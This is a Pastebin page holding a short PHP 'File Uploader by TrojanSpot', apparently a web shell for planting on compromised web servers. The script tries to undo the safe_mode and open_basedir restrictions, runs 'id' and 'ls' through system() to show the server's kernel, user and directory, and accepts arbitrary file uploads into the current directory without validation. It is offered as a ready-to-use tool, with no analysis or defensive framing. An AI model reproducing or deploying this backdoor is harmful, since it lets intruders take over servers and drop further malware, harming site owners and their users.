TrojanSpot

file Uploader php | http://www.pemula.info

Sep 20th, 2012
222
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.07 KB | None | 0 0
  1. Act - Crew . Org <br>
  2. <html><head> <title>File Uploader by TrojanSpot</title> </head><body bgcolor ="black">
  3. <?php
  4. ini_restore("safe_mode");
  5. ini_restore("open_basedir");
  6. $SO = php_uname() ;
  7. $dir = getcwd() ;
  8. $ID = "id";
  9. $LS = "ls";
  10. $idd = $output = system($ID);
  11. echo "<p align ='center'><font size='4' color='red' > <b>Kernel :</b> $SO </p></font>";
  12. echo "<p align ='top'><font color='yellow'> <b>id: $idd </b></p> ";
  13. echo "<br>";
  14. echo "<p align ='top'><font color='white'> <b>Directory :</b> $dir </p>";
  15. echo "<p align ='top'><font color='green'> <b>File Directory: </b> </p>";$output = system($LS);
  16. echo "<br><br>";
  17. print_r('<form action="" method="post" enctype="multipart/form-data">
  18. <input name="arquivo" type="file" /><input name="" type="submit" value="Upload" />');
  19. $arquivo=$_FILES['arquivo']['name'];
  20. if(move_uploaded_file($_FILES['arquivo']['tmp_name'], "".$arquivo)){
  21. echo "<html><script>window.alert('Upload Complete Mas Bro!');</script></html>";
  22. echo "<html><script>window.location.href=window.location.href;</script></html> ";}
  23. ?></body></html>
Add Comment
Please, Sign In to add comment